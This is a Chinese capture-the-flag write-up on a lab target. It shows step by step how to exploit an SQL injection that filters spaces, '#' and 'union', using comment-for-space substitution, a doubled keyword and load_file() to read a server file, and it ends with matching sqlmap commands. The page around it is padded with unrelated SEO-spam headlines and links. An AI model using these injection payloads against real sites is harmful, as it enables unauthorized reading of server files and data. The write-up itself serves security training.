当前位置: 首页 > news >正文

黑马程序员官方网站排名优化公司哪家好

黑马程序员官方网站,排名优化公司哪家好,网站开发所需资料,wordpress条件搜索url:http://192.168.154.253:81/ #打开http://XXX:81/,XXX为靶机的ip地址 审题 1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中 2、开始答题 发现这里url中有一个id的参数&#xff0…

url:http://192.168.154.253:81/  #打开http://XXX:81/,XXX为靶机的ip地址

审题

1、打开题目看到有一个提示,此题目需要通过SQL注入漏洞读取/tmp/360/key文件,key在这个文件中

2、开始答题

发现这里url中有一个id的参数,并且给出了当前所执行的sql语句

第一步:判断注入点

1、?id=1'

2、?id=1'and'1'='1

第二步:判断语句模板

1、使用 order by 判断语句模板列数

发现语句在执行中过滤了空格还过滤了“#”

执行失败:

?id=1'and'1'='1'order by 3#

?id=1'and'1'='1'order+by+3#

执行成功:

?id=1')and'1'='1'order/**/by/**/3%23

解释:

?id=1')and'1'='1'order/**/by/**/3%23

  • ')用来闭合前面的语句,order/**/by/**/3%23(order by 3)用来查询模板列数
  • /**/(用注释的方式代替空格),%23(使用url编码代替#

2、判断出语句模板有4个字段

回显正常:

?id=1')and'1'='1'order/**/by/**/4%23  #执行 order by 4 的时候回显正常

回显不正常:

?id=1')and'1'='1'order/**/by/**/5%23  #执行 order by 5 的时候回显不正常

第三步:找回显点

回显不正常:

?id=1')and'1'='2'union/**/select/**/1,2,3,4%23

思路:使用 and 1=2 报错找回显点

回显正常:

?id=1')and'1'='2'uunionnion/**/select/**/1,2,3,4%23

思路:由于过滤了union,所以这里使用双写的方式经行过滤绕过,并且判断出回显点有3个(语句模板中的234位置均为回显点)

第四步:拿到flag

执行成功:

?id=1')and'1'='2'uunionnion/**/select/**/1,database(),load_file('/tmp/360/key'),user()%23

解释:

—— 1')and'1'='2'union/**/select/**/1,database(),load_file('/tmp/360/key'),user()#')

  • database() #当前数据库名
  • user() #当前数据库用户名
  • load_file('/tmp/360/key') #读取服务器文件

扩展:使用sqlmap一把梭哈

1、由于前面判断出了此题注入点存在过滤空格的情况,所以在使用sqlmap的时候需要指定脚本(用注释/**/替换空格字符' ':--tamper "space2comment.py")运行

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py"

命令:

  • python sqlmap.py -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  #我用的是sqlmap.py脚本所以使用python执行,用kali就直接用第二条命令就行
  • sqlmap -u "http://192.168.154.253:81/vulnerabilities/fu1.php?id=1" --tamper "space2comment.py" --file-read "/tmp/360/key"  

2、获取到flag

http://www.ds6.com.cn/news/15144.html

相关文章:

  • 做网站推荐源创网络互联网营销顾问是做什么的
  • 曲阜住房城乡建设局网站app营销策略都有哪些
  • 天水做网站电话seo定义
  • 廊坊网站推广百度知道合伙人
  • emlog建站教程非国产手机浏览器
  • 日本人真人做真爱的网站网站关键词优化wang
  • 做网站主要步骤网页制作咨询公司
  • 成套小说网站模板中国互联网协会官网
  • 用股票代码做网站的网站seo优化分析
  • 国际知名的论文网站私域流量运营管理
  • weixinqqcom微信官网seo推广软件怎样
  • 响应式网站和自适应网站安徽网络seo
  • 东莞网站制作南城武汉好的seo优化网
  • WordPress大前端top长春网站优化团队
  • 塘厦仿做网站seo岗位职责
  • 动态字设计网站百度西安
  • 店铺推广方法有哪些湖南网站建设seo
  • 沈阳推广平台哪个好百度关键词优化软件如何
  • 网站开发与客户沟通网站一年了百度不收录
  • 企业所得税优惠政策最新2022计算青岛招聘seo
  • a5做网站汕头seo网络推广服务
  • 中文域名最新资讯谷歌seo排名优化
  • 全网营销是什么郑州百度seo网站优化
  • 做网站电脑配置合肥网络公司
  • 深圳php网站开发seo排名优化软件价格
  • 做暧动漫视频在线观看网站青岛seo杭州厂商
  • layui做网站前端企业网站官网
  • 精通网站建设pdf代运营哪家公司最靠谱
  • 东阳网站建设关键词排名点击工具
  • 营销网站建设哪里好薇东莞seo建站优化哪里好